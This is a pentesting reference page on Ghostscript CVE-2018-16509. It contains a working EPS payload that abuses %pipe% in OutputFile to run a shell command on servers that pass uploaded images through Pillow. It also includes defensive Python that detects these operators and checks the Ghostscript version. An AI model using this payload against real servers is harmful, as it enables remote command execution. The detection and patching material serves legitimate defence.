# GhostScript Pentesting

Ghostscript is an interpreter for the PostScript language and for PDF files. Older versions are vulnerable to code execution.

### Arbitrary Command Execution (CVE-2018-16509) Before v9.24 <a href="#arbitrary-command-execution-cve-2018-16509-before-v924" id="arbitrary-command-execution-cve-2018-16509-before-v924"></a>

Reference: <https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509>

If the target website offers an image-upload feature that processes the uploaded files with Python's **Pillow (PIL)**, an uploaded image in EPS format is handed to **Ghostscript**, and remote command execution is possible through the **Ghostscript** vulnerability (a **`-dSAFER`** bypass using the **`OutputFile`** device property with `%pipe%`).\
Create an image file with the contents below and upload it; the command will be executed on the target server.

```postscript
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/hello.txt) currentdevice putdeviceprops
```
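
A defender-side check for the vector above, added here as an example and not code from the original page, from Ghostscript or from Pillow: it flags "image" uploads that carry a PostScript/EPS header or the operators the payload relies on, and it compares a Ghostscript version string against the 9.24 fix. The sample inputs are constructed, and the `installed_gs_version` helper assumes a `gs` binary on `PATH`.

```python
"""Defender-side checks for the CVE-2018-16509 upload vector (added example)."""
import re
import shutil
import subprocess
from typing import List, Optional, Tuple

# Magic bytes of PostScript/EPS files: the ASCII "%!PS" header or the
# 4-byte DOS EPS binary header. A raster image upload should have neither.
POSTSCRIPT_MAGICS = (b"%!PS", b"\xc5\xd0\xd3\xc6")

# Operators the page's payload relies on; a cheap second layer that also
# catches PostScript hidden behind some other header.
SUSPICIOUS = re.compile(rb"%pipe%|/OutputFile|putdeviceprops|setpagedevice", re.I)

FIXED_VERSION = (9, 24)  # first Ghostscript release with the fix

# Constructed samples: a disguised EPS upload carrying the payload, and a PNG stub.
SAMPLE_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n"
              b"mark /OutputFile (%pipe%touch /tmp/hello.txt) currentdevice putdeviceprops\n")
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + b"\x00" * 13


def inspect_upload(data: bytes) -> List[str]:
    """Return the reasons an upload should be rejected; an empty list means it passed."""
    reasons = []
    if data.startswith(POSTSCRIPT_MAGICS):
        reasons.append("postscript header")
    hits = sorted({m.group(0).lower().decode() for m in SUSPICIOUS.finditer(data)})
    reasons.extend("operator " + h for h in hits)
    return reasons


def parse_gs_version(text: str) -> Optional[Tuple[int, int]]:
    """Pull (major, minor) out of strings like '9.23' or 'GPL Ghostscript 10.02.1'."""
    m = re.search(r"(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def gs_is_vulnerable(version_text: str) -> bool:
    """True when the version predates 9.24; an unparsable string fails closed."""
    parsed = parse_gs_version(version_text)
    return parsed is None or parsed < FIXED_VERSION


def installed_gs_version() -> Optional[str]:
    """Ask the local gs binary for its version (assumes gs on PATH); None if absent."""
    if shutil.which("gs") is None:
        return None
    return subprocess.run(["gs", "--version"], capture_output=True, text=True).stdout.strip()
```

Run `inspect_upload` on every upload before it reaches Pillow, and treat a `gs_is_vulnerable(installed_gs_version())` result of `True` as a reason to upgrade the host before accepting EPS at all.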

### References <a href="#references" id="references"></a>

* [SecLists](https://seclists.org/oss-sec/2018/q3/142)
